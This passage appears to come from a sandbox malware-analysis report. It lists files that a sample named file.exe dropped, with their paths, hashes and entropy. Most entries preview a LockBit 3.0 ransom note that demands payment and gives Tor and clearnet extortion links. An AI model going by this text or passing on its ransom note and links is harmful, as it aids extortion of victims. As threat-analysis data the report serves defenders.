                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978204768957099
                Encrypted:false
                SSDEEP:192:2oiLPbpqH0CxFypPc2uitIw3QNF5OyrHsk0UnYIFbo:sEHjxFypP5ui13S5DMk06Yh
                MD5:6CA77E175FF9694CC971712FCCDD3356
                SHA1:79AD395C196B74E812953A3EEDE6862E9B688C9E
                SHA-256:9AC2B94983136C35E91A561BEB59F834D6DBDB44A77F081C7F2D5A24A8C35F3B
                SHA-512:992B57898113F66494933205273E710A0E5C007582411C808CDA51C4C42EF9CA709CA0C916905840D5F241E5D9E98FE102A423B461D705DE4AA9F040EBC321B1
                Malicious:false
                Preview:y"1.<.\.....LB....R...W.?.M%.L.S...!(...........[L..^7v.<...'...|a0.q.s...".(..ZXLE^(..J......z....k`....aj=r.q..7...nz...zU...6...Z1.._.@.........[....._.=....2R..t.....&*.^|....X.l...oz...]\".A`.!...f.I.... iK.alA..=.....M....2go&.<M.2.......FT^..yH.(.....{.8.H6p..W'...X.y.....OT82..;..T.o.Ec...(..".NH.......J-f.U.w..L)S...Cu............U.....H07.7......>.5.a...e..t.nL..S.Mt.I.....w$}...L.k@.N.T..]..;.?..W."[z.u|m.Szrul}9..\.,....].U...N.......%..&Ty.C}.-....]=.~.m{....G...*Q.....@.'.&{d.a./I*.~...%.D.=[.kd.VJ}..=8..-x....!..-.........U....Q.d?....*.f:.J3.b......H...S..p.y.....HYBc....Y..iE._..4.{d.o....6.j\x.X."Q..?..i.0....1"{a.;.....G;....'5..........'.....n..Xy..N5..v.VFPr.p..x.s.vW..1.g,.n"..35..D..!.qG+k.nf..2..b.s.vfY......z\..7.I8...mB...K.2.x.....!.6$.+.03q..+..%V.m.0a..+..O.!..*.{..3.......5.....-.........A.g.......|1.6.PW...YN!.O.......!.v.5lo.9.s.3...x,t%&.4J..'8*...z.....".X_.a.A..0.#..0<vV+gt....B...2..pigK.F..47.k$o.....*.=.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
